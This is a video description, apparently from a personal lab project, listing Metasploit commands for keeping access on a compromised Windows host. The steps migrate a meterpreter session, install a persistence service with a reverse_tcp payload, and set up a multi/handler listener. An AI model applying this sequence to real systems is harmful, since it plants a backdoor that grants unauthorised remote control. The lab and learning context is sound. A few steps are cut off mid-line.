Project 110 - Post Exploitation: Establishing Persistence on Windows Systems
Автор: Daryl Shows His Work
Загружено: 2025-12-20
Просмотров: 8
Commands Used (in the order that they appear in the video)
1. sysinfo (to verify that we have a 64 bit meterpreter session)
2. Ctrl + Z (to background the meterpreter session)
3. use post/windows/manage/archmigrate (to automate the migration from x86 architecture to 64 bit)
4. set SESSION 1
5. run
6. sessions 1
7. sysinfo (to verify 64 bit meterpreter session)
8. getuid (to verify that I have elevated privileges which I need)
9. Ctlr + Z (to background)
10. search platform:windows persistence (to search for persistence module)
11. use exploit/windows/local/persistence_service (creates a persistence
12. service paired with Meterpreter that connects to a listener such as multi/handler to grant access to the target host)
13. set payload windows/meterpreter/reverse_tcp (to use 32 bit variation of the exploit)
14. set SESSION 1 (can set REMOTE
15. exploit
16. getuid (to verify that I have full system authority)
17. exit
18. sessions -K (to kill all sessions)
19. use multi/handler (to set up listener for a connection)
20. set payload windows/meterpreter/reverse_tcp
21. show options
22. set LHOST eth1
23. exploit (should immediately get a meterpreter session)
Testing Persistence
24. exit
25. exploit
26. exit
27. exit
28. service postgresql start && msfconsole
29. use multi/handler
30. set payload windows/meterpreter/reverse_tcp
31. set LHOST eth1
32. exploit
Доступные форматы для скачивания:
Скачать видео mp4
-
Информация по загрузке: